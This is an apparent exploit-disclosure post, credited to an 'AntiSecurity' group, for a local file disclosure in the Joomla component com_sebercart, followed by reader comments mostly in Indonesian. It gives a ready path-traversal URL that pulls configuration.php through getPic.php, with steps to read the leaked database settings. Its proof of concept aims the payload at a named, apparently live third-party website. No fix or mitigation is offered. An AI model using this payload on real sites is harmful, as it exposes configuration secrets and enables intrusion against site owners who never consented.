SeberCart LFD Vuln [ readfile() ]


[o] Joomla Component Seber Cart Local File Disclosure Vulnerability


Software : com_sebercart
Vendor : http://www.seber.com.au/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/


[o] Exploit

http://localhost/[path]/components/com_sebercart/getPic.php?p=../../configuration.php

Download image.jpg file and open it with notepad or gedit.
You will see joomla configuration there.


[o] PoC

http://www.rare-earth.com.au/components/com_sebercart/getPic.php?p=../../configuration.php

6 Responses so far.

  1. kemud says:

    g bisa kak.....hahaha...isa ajarin langsung g kak.Ymnya apa biar saya add..

  2. NoGe says:

    join ke public irc chan kita aza yah..

    #evilc0de @ irc.byroe.net

  3. oke deh...tapi kalo isa ym kak . soale dari dulu aku belajar lewat web ini , and g tau (kenal) sama yang bikin.....

  4. kemud says:

    bang ajari aku,,,,tak cari g nemu2 huhuhu....YMnya apa ntar biar aku add bang apa email gt.

  5. NoGe says:

    wew.. nyari apa yang ga nemu2 niy?
    neh email gw.. noge.code@gmail.com

  6. Thank you for sharing with us. The content is very good and helpful for me, I learn and know more about it.